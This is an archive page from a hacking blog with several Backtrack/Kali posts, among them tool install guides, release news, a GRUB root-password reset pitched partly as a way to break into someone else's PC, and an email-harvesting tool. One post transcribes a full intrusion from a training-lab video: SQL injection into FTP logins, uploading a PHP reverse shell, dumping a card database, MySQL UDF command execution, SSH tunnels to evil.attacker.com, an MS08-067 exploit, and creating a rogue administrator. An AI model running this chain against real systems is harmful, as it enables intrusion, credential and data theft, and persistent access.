Affichage des articles dont le libellé est Backtrack. Afficher tous les articles
Affichage des articles dont le libellé est Backtrack. Afficher tous les articles

[GUIDE] Installing Social Engineering Toolkit (S.E.T.) on Windows


How to Install?
  1. Download and extract S.E.T anywhere you want.
  2. Download and install PyCrypto library based on your python version
  3. Done and you're ready to go! :)
How to Run the scripts?

      1.Open up your cmd, and cd to the S.E.T directory
cd\
cd set
   
     2. Finally type in your cmd as below
python setoolkit
Downloads
Social Engineering Toolkit (40MB) / Mirror
PyCrypto
 That's all and happy hacking :)
Read more

by Malik korrich ~ dimanche 2 novembre 2014 0 commentaires

[TRICKS] How to make your command prompt looks like Backtrack Terminal



How to install?
  1. Download and extract the file
  2. Copy and paste it anywhere you like
  3. Run Console.exe Enjoy :)
 How to enable transparent window?
  1.  Go to Edit>Settings 
  2. You will see a new popup window, click on Appearance>More. Under Windows Transparency setting, click on Alpha and adjust the transparency rate , click OK, and you good to go.
 Downloads
Backtrack Terminal (1.6MB) / Mirror
          Without watermark(Recoded by K3RAMA7)
 Backtrack Terminal 2 (1.6MB)
Read more

by Malik korrich ~ jeudi 23 octobre 2014 0 commentaires

How to Hack/Reset Kali linux login password


Recently changed Kali Linux Log in Password and you have forgotten it. or May be You want to Hack someone's Kali Linux PC. I am giving you one full proof solution for both issues. I really don't know why Kali developers left a loophole behind the Kali Linux well i also want to tell you that this is also working with Backtrack. So doesn't matter you have forgotten your Backtrack Admin log in password or Kali Linux Admin Log in Password just follow below instruction.


1. First boot your kali linux and wait  untill the Grub will come,  As you will see the grub , then scroll down to recovery mode  then press E
                                                                   (click image for large view)

2. After pressing E you will see this screen. Here you have to change some words and need to add some sentence as shown in image 

3. After changing and adding just press F10

4. After pressing F10 it will be reboot and you will see this screen, Here you have to type a command passwd root and hit enter

5. Then type your new root password, hit enter and again retype your root password and hit enter afterthat you will see a massage password update successfully 

6. Now power off by pressing your laptop/PC power button and switch on it again and login with your new password 
(click image for large view)


Like it ? Share it.
Read more

by Malik korrich ~ mardi 11 juin 2013 0 commentaires

Backtrack Reborn - Kali Linux

Image Credit
Vulnerability scanning and penetration testing tools are the weapon of a hacker and information security expert, tool is the common requirement for both white hat and black hat hackers. So Linux distributions that have designed specially for penetration testing purpose are very important from the point of view of both attacking and defending.






Backtrack is one of the famous Linux distro that has all the necessary tools to conduct a successful attack on the victim network / computer. We all were expecting to get Backtrack 6 because after backtrack 5 it has to be the next version, but the Offensive-Security team has decided to restructure the current distribution and hence Kali Linux as Backtrack 6 has been released.

Kali Linux has been released on March 13th 2013, as the official said that the Kali Linux is more stable and more secure. The video that has been released by official can give the information of overall requirement and expectation from this distro.






 

 

Download Backtrack 6 / Kali Linux

Kali Linux is available on the official website with the basic guide on installation and usage.

If you have used Kali Linux than kindly share your views about it, we will publish the Kali Linux installation guide later and the articles would be like:

How to install Kali Linux
Kali Linux Dual Boot Installation with Windows 


Note: If you want to learn more about Linux and Windows based Penetration testing, you might want to subscribe our RSS feed and Email Subscription  or become our Facebook fan! You will get all the latest updates at both the places.
Read more

by Malik korrich ~ samedi 23 mars 2013 0 commentaires

BackTrack 5 R3 Released

Backtrack is one of the best Linux distribution for penetration testing, it helps ethical hackers to perform the penetration testing on the network, web application, wireless network, RFID and many more. Backtrack 5 was the last released but now backtrack 5 R3 has been released by the backtrack community. 



  

What official website describe about it:

The time has come to refresh our security tool arsenal – BackTrack 5 R3 has been released. R3 focuses on bug-fixes as well as the addition of over 60 new tools – several of which were released in BlackHat and Defcon 2012. A whole new tool category was populated – “Physical Exploitation”, which now includes tools such as the Arduino IDE and libraries, as well as the Kautilya Teensy payload collection.

Building, testing and releasing a new BackTrack revision is never an easy task. Keeping up-to-date with all the latest tools, while balancing their requirements of dependencies, is akin to a magic show juggling act. Thankfully, active members of our redmine community such as backtracklover and JudasIscariot make our task that much easier by actively reporting bugs and suggesting new tools on a regular basis. Hats off to the both of you.

Together with our usual KDE and GNOME, 32/64 bit ISOs, we have released a single VMware Image (Gnome, 32 bit). For those requiring other VM flavors of BackTrack – building your own VMWare image is easy – instructions can be found in the BackTrack Wiki.

For the insanely impatient, you can download the BackTrack 5 R3 release via torrent right now. Direct ISO downloads will be available once all our HTTP mirrors have synched, which should take a couple more hours. Once this happens, we will update our BackTrack Download page with all links.








Note: If you want to learn more about Linux and Windows based Penetration testing, you might want to subscribe our RSS feed and Email Subscription  or become our Facebook fan! You will get all the latest updates at both the places.
Read more

by Malik korrich ~ mardi 14 août 2012 0 commentaires

Backtrack 5 R2 Release - Update to Backtrack 5 R2

How to update and upgrade your current (backtrack 5 R1) backtrack machine into the latest version backtrack 5 R2, however backtrack 5 R2 will be release on 1st March but the kernel of BT5 R2 has been arrived and you can update it by yourself or wait for the official release. The new kernel of 3.2.6 BT5 R2 will provide a more stable and complete penetration testing environment than ever before.
Open the terminal and update your backtrack 5 R1 installation.


apt-get update
apt-get dist-upgrade
reboot
Now you have the latest kernel.
OPTIONAL – Once rebooted, log back in, and get your pretty splash screen back.

fix-splash
reboot
On the next reboot, you should see the red console splash screen appear.
Verify that you are running a 3.2.6 kernel:

uname -a
You should see something like “Linux bt 3.2.6 …”
Feel free to install any or all of the new tools featured in BackTrack 5 R2:

apt-get install pipal findmyhash metasploit joomscan hashcat-gui golismero easy-creds pyrit sqlsus vega libhijack tlssled hash-identifier wol-e dirb reaver wce sslyze magictree nipper-ng rec-studio hotpatch xspy arduino rebind horst watobo patator thc-ssl-dos redfang findmyhash killerbee goofile bt-audit bluelog extundelete se-toolkit casefile sucrack dpscan dnschef
Load the new security update and then upgrade it

echo "deb http://updates.repository.backtrack-linux.org revolution main microverse non-free testing" >> /etc/apt/sources.list
apt-get update
apt-get dist-upgrade
It will be asked about the revision make sure to choose all by default and hit enter.

Restart your distribution with the services.
Backtrack 5 R2 will be officially release in March 1 with the complete information.
Source

Note: If you want to learn more about Linux and Windows based Penetration testing, you might want to subscribe our RSS feed and Email Subscription  or become our Facebook fan! You will get all the latest updates at both the places.
Read more

by Malik korrich ~ samedi 25 février 2012 0 commentaires

How to Install Wordpress on Localhost Linux Backtrack 5

Wordpress is a wonderful and user friendly CMS (content management system), there are so many blogs now a days are using wordpress software for their blogging. Although there are different other CMS software's are available but wordpress has its own importance due to its amazing features, well this article is not about to discuss advantages of wordpress over other CMS like Joomla but the main aim of this article is to demonstrate. How to install wordpress on your Linux machine whether localhost or remote (web server).
You can install wordpress on your local computer but why to install wordpress on locahost ? Answer is very simple penetration testing / Ethical hacking requires practice so install wordpress on your computer to practice wordpress hacking. After installation you can test different wordpress vulnerability scanner software's and you can use different plug ins too.

The method to install wordpress on windows is different from Linux but easy, all you need to do is to download a xampp setup because it contain the apache and sql software's but in backtrack 5 R1 (based on ubuntu) we have apache and sql software by default. So follow this to install wordpress on your Linux machine.
  • Download the wordpress software
  • Extract it on www folder (goto the file system then var and then www) it is good to make a separate folder for wordpress.
  • Now start apache and sql (Applications → Backtrack → Services → HTTPD → MYSQLD)
  • There is a need to create a database for wordpress, open terminal and type:
root@bt:~# mysql -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 104
Server version: 5.1.41-3ubuntu12.10 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> CREATE DATABASE name;
Query OK, 1 row affected (0.00 sec)

mysql> GRANT ALL PRIVILAGES ON name.* TO "username"@"localhost"
-> IDENTIFIED BY "passwordhere";
Query OK, 0 row affected (0.00 sec)

mysql> FLUSH PRIVILAGES;
Query OK, 0 row affected (0.00 sec)

mysql> EXIT
Bye
root@bt:~#

  • Now on your browser locate the localhost in my case http://127.0.0.1/wordpress
  • Now on the database setting panel
Database Name: wordpress (or any database )
User Name: username (entered on Mysql setup)
Password: passwordhere
Database Host: localhost
Table Prefix: wp_
  • On the next window copy this config code and create a new file paste it then save it to the same directory with the name wp-config.php
  • Then click on install
  • Reopen the browser and create an admin account.
  • Thats it.

You can open your new wordpress http://127.0.0.1/wordpress


Note: If you want to learn more about Linux and Windows based Penetration testing, you might want to subscribe our RSS feed and Email Subscription  or become our Facebook fan! You will get all the latest updates at both the places.
Read more

by Malik korrich ~ dimanche 5 février 2012 0 commentaires

Arachni Web Application Security Scanner Framework Tutorial

Web application hacking is very common and there are so many tools that can exploit the web application vulnerabilities like SQL injection, XSS, RFI, LFI and others. The vary first step is to find the vulnerabilities on web application. Arachni is a feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of web applications. So in this article I will show you how to get and install arachni and how to launch your first attack against a web application.

DownloadArachni

Since I am on Linux backtrack 5 R1 but you can use other Linux distribution like ubuntu. Start the web mode of arachni.

root@bt:~/Downloads/arachni-v0.4.0.2-cde# sh arachni_web
Now the question is how to edit Dispatchers of Arachni because without dispatchers arachni does not work.

root@bt:~/Downloads/arachni-v0.4.0.2-cde# sh arachni_rpcd
Now click on the plug ins to choose the best plug ins then click on the module to select and unselected modules depends on your need.
Now click on the start scan to run your first scan enter the URL of the target web application then simply start the attack, after sometimes you need to evaluate the report to get the vulnerabilities.







Note: If you want to learn more about Linux and Windows based Penetration testing, you might want to subscribe our RSS feed and Email Subscription  or become our Facebook fan! You will get all the latest updates at both the places.
Read more

by Malik korrich ~ dimanche 22 janvier 2012 0 commentaires

Penetration Testing in the Real World Offensive Security Video Tutorial

Hacking, cracking and penetration testing are the hot topics of this blog and we have discussed different tutorials based on backtrack Linux specially backtrack 5 R1 because it is the newest one, however there are many video tutorials of backtrack Linux available that has been made on previous version of backtrack like backtrack 4 and others. The main aim and idea is same means to educate people how to do a penetration testing. Offensive security.

I think there is no need to introduce offensive security, I was searching on Internet and I have found a wonderful video tutorial made by offensive security team.

This video will teach you about remote penetration testing and how to enumerate and map the internal network of a web server (database, SMS and other servers). Although this video has been created on previous version of backtrack but it is applicable on backtrack 5 r1 because tools are common.



Commands & Tools that Discussed on the Video

ftp-brute.py


#!/usr/bin/python
from ftplib import FTP
print "Attempting user Directory Discover via FTP"
for i in range(0,6):
username=%') and 1=2 union select 1,1,uid,gid,homedir,shell from ftpuser LIMIT "+ STR(I)+",1; -- "
password=str("1")
ftp=FTP('www.offseclabs.com')
ftp.login(username,password)
print "Logged in as user "+str(i)+",1"
ftp.retrlines('LIST')
ftp.close()

Open Terminal A : 


nmap -p 21,80 www.offseclabs.com
nc -v www.offseclabs.com 80
HEAD / HTTP/1.0
(To enumerate the webserver)
clear
ftp www.offseclabs.com
username - bob
password - bob
(To enumerate the ftp server)
ftp www.offseclabs.com
username - %') and 1=2 union select 1,1,uid,gid,homedir,shell from ftpuser; --
password - 1
(logged in to the ftp server)
pwd
ls
bye
clear
cd core
clear
nano brute.py --> (see above ftp-brute.py)
./brute.py
(get the fifth user who has mapped to the root directory of webserver)
clear
ftp www.offseclabs.com
username - %') and 1=2 union select 1,1,uid,gid,homedir,shell from ftpuser LIMIT 5,1; --
password - 1
(logged in as the fifth user)
ls
put rs.php --> (a reverse php shell) Download reverse PHP shell
-----------------------
Open Terminal B :
nc -lvp 80
-----------------------
Open Terminal C :
wget www.offseclabs.com/rs.php
(Then, at Terminal B, we got a reverse shell)
-----------------------
Go back to Terminal B :
(inside the reverse shell)
/sbin/ifconfig
pwd
cd /var/www
ls -la
cd includes
cat configure.php
(get the MySQL username and password as well as MySQL server address and database name)
mysqldump -u root -p1q2w3e4r5t6y -h 10.150.0.5 oscommerce > /var/www/images/ccdump.txt
------------------------
Open a Firefox :
www.offseclabs.com/images/ccdump.txt
(we got the database dump)
-------------------------
Go back to Terminal A :
(inside the ftp server)
put up.html --> (file upload html file)
put up.php -- > (file upload php file)
-------------------------
Open Firefox :
www.offseclabs.com/up.html
(upload lib_mysqludf_sys.so and marked it as 1)
(upload rs [a binary reverse shell) and marked it as 2)
** Details of lib_mysqludf_sys.so
---------------------------
Go back to Terminal A :
(quit the ftp server)
bye
clear
exit
(quit Terminal A)
----------------------------
Go back to Terminal B :
mysql -u root -p1q2w3e4r5t6y -h 10.150.0.5
(login to MySQL server)
use pwn;
SELECT imgdata from binfile where title="1" into dumpfile '/usr/lib/lib_mysqludf_sys.so';
SELECT imgdata from binfile where title="2" into dumpfile '/tmp/db';
CREATE FUNCTION lib_mysqludf_sys_info RETURNS string SONAME 'lib_mysqludf_sys.so';
CREATE FUNCTION sys_get RETURNS string SONAME 'lib_mysqludf_sys.so';
CREATE FUNCTION sys_set RETURNS int SONAME 'lib_mysqludf_sys.so';
CREATE FUNCTION sys_exec RETURNS int SONAME 'lib_mysqludf_sys.so';
CREATE FUNCTION sys_eval RETURNS string SONAME 'lib_mysqludf_sys.so';
SELECT sys_eval('chmod 755 /tmp/bd');
SELECT sys_eval('/tmp/bd &');
(don't press Enter at this moment)
---------------------------
Open Terminal D :
nc -lvp 80
(go back to Terminal B and press enter, you will get reserver shell at Terminal D)
----------------------------
Open Terminal E :
nc -lvp 80
----------------------------
Go back to Terminal B :
(inside the MySQL server)
SELECT sys_eval('/tmp/bd &');
(press enter and we got another reverse shell at Terminal E)
---------------------------
Go back to Terminal E :
(inside the reverse shell)
ping -c 1 10.150.0.20
clear
ssh -l root -t -t -R 445:10.150.0.20:445 evil.attacker.com
(create a remote tunnel at port 445)
-----------------------------
Open Terminal F :
netstat antp
nmap -sS 127.0.0.1 -p445 --script smb-check-vulns.nse
-----------------------------
Go back to Terminal D :
ssh -l root -t -t -R 4444:10.150.0.20:4444 evil.attacker.com
(create a remote tunnel at port 4444)
clear
------------------------------
Go back to Terminal F :
cd core
nano nx.py --> (a ms08-067 python exploit for win2k3 sp2)
clear
./nx.py 127.0.0.1
nc -v 127.0.0.1 4444
(we got a remote shell of 10.150.0.20)
ip config
net user hacker hacker /add
net localgroup administrators hacker /add
---------------------------------
Go back to Terminal D :
(quit the tunnel)
exit
clear
ssh -l root -t -t -R 3389:10.150.0.20:3389 evil.attacker.com
(create another remote tunnel on port 3389)
clear
-----------------------------------
Open Terminal G :
netstat -antp | grep LISTEN
clear
rdesktop 127.0.0.1
(login to the 10.150.0.20 with username - hacker and password - hacker)




Note: If you want to learn more about Linux and Windows based Penetration testing, you might want to subscribe our RSS feed and Email Subscription  or become our Facebook fan! You will get all the latest updates at both the places.
Read more

by Malik korrich ~ mercredi 11 janvier 2012 0 commentaires

UberHarvest - Email & Domain Harvesting Multi Purpose Tool

This FREE tool was designed to get a user to enter an individual website or load a text file containing many URLs at once. Once the URL(s) have been entered, the uberharvest application crawl through the website (and all the links within that website) searching for valid email addresses. The application can search for email addresses randomly (i.e. something@domain.something or the user can chose to search for email addresses for a specific domain (i.e. for www.ubersec.com the application can search for all @ubersec.com email addresses within the website). 

Then the user can chose to either print the results on the screen or save them into a text file or print them out to an XML file with XSL style-sheet. In addition, the application can also be used to search for Mail Exchange (MX) server Internet Protocol (IP) addresses corresponding with each URL that has been found by the uberharvest application. And then that information can be used by the uberharvest application to test if the MX server is also an Open-Relay server or not. Yet, the uberharvest application also provides the user with the option to use a random user-agent crawling each link and performing the scans using anonymous proxy servers.


Requirements



The uberharvest tool was designed in the Python language. It requires Python version 2.52 and UP to work properly. If you are using Ubuntu/Backtrack and you have a Python version that is lower than the Python 2.52 supported version, please refer my blog for instructions on downloading and switching a newer version of Python.

Uberharvest also require the user to manually download and install Network Mapper (NMAP) from http://www.insecure.org


Uberharvest Features



Harvest for email addresses from one website or many at once

Get target website domain name, domain IP and Geo location

Scan target website for Mail Exchange (MX) servers IP address.

Test whether the target MX servers are open-relay server

Get the target web server version and x-powered-by from the header

Harvest information using evasion techniques through the use of anonymous proxy and different user-agents.

Get target server domains from Google search engine

Use the UP ARROW to reuse old input to increase time efficiency

Print out results in XML format and XSL style-sheet.


Disclaimer



This tool was created by Yakov Goldberg for legal penetration testing purposes only. The tool is FREE of charge and must only be used for helping society and improving upon cyber security. That tool (uberharvest) was created to automate and make the life of security professionals a little easier. Thus, this tool MUST NOT is used to harm any entity or cause an damage. Yakov Goldberg does not claim any responsibility for any information that is retrieved by using this tool and any other further reckless or intentional malicious or none malicious attacks that someone might or may attempt to do by using the information gathered from this tool.


Operating System(s) compatibility



The uberharvest tool was designed by the Python language and is currently compatible with newer UBUNTU/Backtrack releases. However, all other Linux distribution users may try to attempt using the Uberharvest application as well. Yet, the instructions below are compatible with UBUNTU only so none UBUNTU users may need to refer to some other websites to get some instructions other than those provided in this website for installing modules and perquisites required for using the uberharvest tool. Uberharvest have been tested in the following Ubuntu/Backtrack distributions:
Distributor ID: Ubuntu
Description: Ubuntu 10.04.2 LTS
Release: 10.04
Codename: lucid
Distributor ID: Ubuntu
Description: Ubuntu 10.10
Release: 10.10
Codename: maverick
Distributor ID: BackTrack
Description: BackTrack 4 R2
Release: 4 R2
Codename: Nemesis
Distributor ID: Ubuntu
Description: Ubuntu 11.10
Release: 11.10
Codename: oneiric
Distributor ID: BackTrack 5

Download and installation process

ehacking@ubuntu:~ $su -
ehacking@ubuntu:~ #wget http://ubersec.com/downloads/uberharvest_2_80.tar.bz2
ehacking@ubuntu:~ #md5sum uberharvest_2_80.tar.bz2
Now compare the md5sum value with the value posted in www.ubersec.com/downloads
ehacking@ubuntu:~ #bzip2 -cd uberharvest_2_80.tar.bz2 | tar xvf -
ehacking@ubuntu:~ #cd
ehacking@ubuntu:~/uberharvest#./setup
EXAMPLE 1
The following tag [-m] will load the uberharvest tool and require the user to type one URL address of a
website he or she are interested in for harvesting email address.

ehacking@ubuntu:~/uberharvest#./uberharvest -m
STEPS:
Now you will be required to type a full website address that you would like to scan
Please enter a valid web address. For example, http://www.ubersec.com
Please enter the address: http://www.ubersec.com
I typed this full URL http://www.ubersec.com for scanning this website
QUESTION 1
Would you like to search for a specific email address domain? For example, @ubersec.com
[Y]es – The user will specify domain name (i.e. ubersec.com)
[N]o – The tool will search for random emails (i.e. @ .)
Please type Y or N:n
If you select [y], you will have to specify a domain name such as ubersec.com or @ubersec.com.
In that case, uberharvest will search through the website and harvest all email that follow the
@ubersec.com criteria.
If you select [n], the uberharvest tool will search through the target website and harvest all emails (i.e.
@ .)
QUESTION 2
Would you like to save output to a text file?
[Y]es – The output will be saved to a file
[N]o – The output will be displayed on the screen
Please type Y or N: n
If you select [n], the output will be displayed on the screen only.
If you select [y], the output will be save on a results will be saved to a file in the [vault/] folder
QUESTION 3
Would you like to search only for URLs that are specific for the website that you are interested?
HINT,
For example, if your website is http://www.ubersec.com if you say [Y], uberharvest will only search for emails within links that belong to ubersec.com rather than jumping to other websites.
[Y]es – Uberharvest will only search for emails in links that belong to that website (i.e. ubersec.com)
[N]o – Uberharvest will search for emails also in other links that are referenced in the website.
Please type Y or N:n
If you select [n], uberharvest tool will search through www.ubersec.com website, get all other links mention in the ubersec website and finally the tool will search within these links for all other email addresses.
If you select [y], uberharvest tool will search through www.ubersec.com website, get only the links that belongs to ubersec.com and finally search within these links for all other email addresses.
Press [Enter] and off we go…
THE RESULTS ARE


More tutorials and updates can be found Here.



Note: If you want to learn more about Linux and Windows based Penetration testing, you might want to subscribe our RSS feed and Email Subscription  or become our Facebook fan! You will get all the latest updates at both the places.
Read more

by Malik korrich ~ dimanche 8 janvier 2012 0 commentaires

« Articles plus anciens